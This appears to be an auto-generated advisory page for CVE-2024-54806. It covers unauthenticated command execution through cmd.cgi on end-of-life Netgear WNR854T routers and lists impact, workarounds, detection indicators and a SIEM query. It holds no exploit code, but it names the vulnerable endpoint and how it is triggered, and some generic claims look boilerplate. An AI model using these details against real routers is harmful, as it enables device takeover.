CVE-2024-54806 – CVE-2024-54806 allows remote attackers to execu... (How to Fix)

Q: What is the severity of CVE-2024-54806?

CVE-2024-54806 has a CVSS score of 9.8 (CRITICAL). CVE-2024-54806 allows remote attackers to execute arbitrary system commands on Netgear WNR854T routers through the cmd.cgi web interface. This affects Netgear WNR854T routers running firmware version 1.5.2 in North America. Attackers can gain complete control of affected devices.

📋 TL;DR

CVE-2024-54806 allows remote attackers to execute arbitrary system commands on Netgear WNR854T routers through the cmd.cgi web interface. This affects Netgear WNR854T routers running firmware version 1.5.2 in North America. Attackers can gain complete control of affected devices.

💻 Affected Systems

Products:

Netgear WNR854T

Versions: 1.5.2 (North America firmware)

Operating Systems: Embedded router firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects North American firmware version. Older versions may also be vulnerable but unconfirmed.

📦 What is this software?

Wnr854t Firmware by Netgear

View all CVEs affecting Wnr854t Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal network devices, and use router as botnet node.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential theft from network traffic, and installation of cryptocurrency miners or other malware.

🟢

If Mitigated

Limited impact if router is isolated from internet and internal network, though local network compromise remains possible.

🌐 Internet-Facing: HIGH - Router web interface is typically internet-accessible by default, allowing remote exploitation.

🏢 Internal Only: HIGH - Even if not internet-facing, attackers on local network can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires web interface access but no authentication. Simple HTTP requests can trigger command execution.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Netgear WNR854T is end-of-life and no longer supported. Consider replacement with supported router.

🔧 Temporary Workarounds

Disable web interface remote access

all

Prevent external access to router web interface

Login to router admin > Advanced > Remote Management > Disable

Change default admin password

all

Use strong unique password for router admin

Login to router admin > Advanced > Administration > Set Password

🧯 If You Can't Patch

Replace router with supported model
Isolate router in separate VLAN with strict firewall rules

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface: Advanced > Administration > Router Status > Firmware Version

Check Version:

curl -s http://router-ip/ | grep -i firmware

Verify Fix Applied:

No fix available to verify. Workarounds can be verified by testing web interface accessibility.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /cmd.cgi
Multiple failed login attempts followed by cmd.cgi access
Router logs showing command execution

Network Indicators:

HTTP requests to router IP with cmd.cgi parameters
Outbound connections from router to suspicious IPs
DNS queries to malicious domains from router

SIEM Query:

source="router.log" AND (uri="/cmd.cgi" OR method="POST" AND uri="/")

📊 Metadata

CVE ID: CVE-2024-54806

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

EPSS Score: 1.44% exploit probability (80.4th percentile)

Published: March 31, 2025

Last Updated: April 17, 2025

🔗 References

https://faultpoint.com/post/2025-03-25-8-cves-on-the-wnr854t-junkyard/#806 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-54806, you might also want to check these: